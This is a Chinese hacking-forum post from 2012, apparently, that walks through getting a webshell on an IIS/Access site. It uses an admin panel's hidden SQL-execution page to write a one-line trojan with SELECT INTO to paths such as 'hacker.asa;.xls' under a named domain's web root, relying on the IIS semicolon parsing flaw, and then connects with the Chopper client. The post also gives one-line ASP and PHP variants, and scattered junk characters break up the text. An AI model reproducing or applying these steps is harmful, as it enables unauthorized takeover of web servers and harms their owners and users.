找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2005|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。$ `* G8 T' {: q7 F
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
  o1 {" b+ G8 V文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
" R1 ]) f4 ~3 j( t然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 h3 @7 {; ~2 S
1.create table cmd (a varchar(50))  J$ T+ k4 M/ w8 v' @
2.insert into cmd (a) values (‘‘)
: F7 h7 H6 w. @3 O3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
: d5 u. r* w3 ^2 V(把表cmd的内容导出为物理路径的一个EXCEL文件)
9 Z. J+ w' q8 l, Q4.drop table cmd
: o+ F0 n! H5 j7 B( G利用IIS的BUG成功拿到了WEBSHELL。" Q4 o+ `) x8 I* i8 D7 O' O4 _6 m

  P/ G# W. ?* q: o6 Z直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话' ?  {. G, @7 ~6 _+ k9 q8 y3 n
* g7 }8 N5 _0 \* U
  SQL语句意思解释:, G2 ?7 F' g# E
  第一句% F$ i" F5 v3 {/ T
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
" v9 {' |( \8 [( l. H: _
* m5 m- x5 c- V. m3 ~- q9 A  第二句% @, P% k% U8 I6 }
  在表cmd的a字段插入一句话木马* V5 ]" r! ^: K9 f0 Y
  第三句9 S$ t$ u- l3 G( M: i9 d: h
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
. U7 e. Y: C- P) ]5 u( _, Y2 C% w
) d% k% H+ ~3 n$ Q# |. r- }  第四句
- n0 S% D+ Y6 @, _1 O  删除建立的cmd表, c% j. R0 o0 X3 i/ `; f
/ n- S  I0 A0 ^( O& ?5 ~, c
  以下内容为测试:; G0 `+ c6 D4 q5 k5 c
  Access利用后台SQL执行命令功能导出WebShell:
0 Y0 |0 E* E, E& V/ u. m% a  这个更简单:
, x0 \( ~# t! w( K% t  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]6 j4 _; ]$ C7 T( W, k1 t0 e
  或者  k) |8 M7 j, W
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]* a" j* T& l, d5 ]+ b: L0 ~, o- @
; u. r2 q0 _) ]1 [6 s
  后台有执行SQL语句功能(vote为已知表段)
: h1 w, D8 W7 G: I9 z& O& t  希望对大家有所帮助拿shell的又一个思路4 A: b. `! [. X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表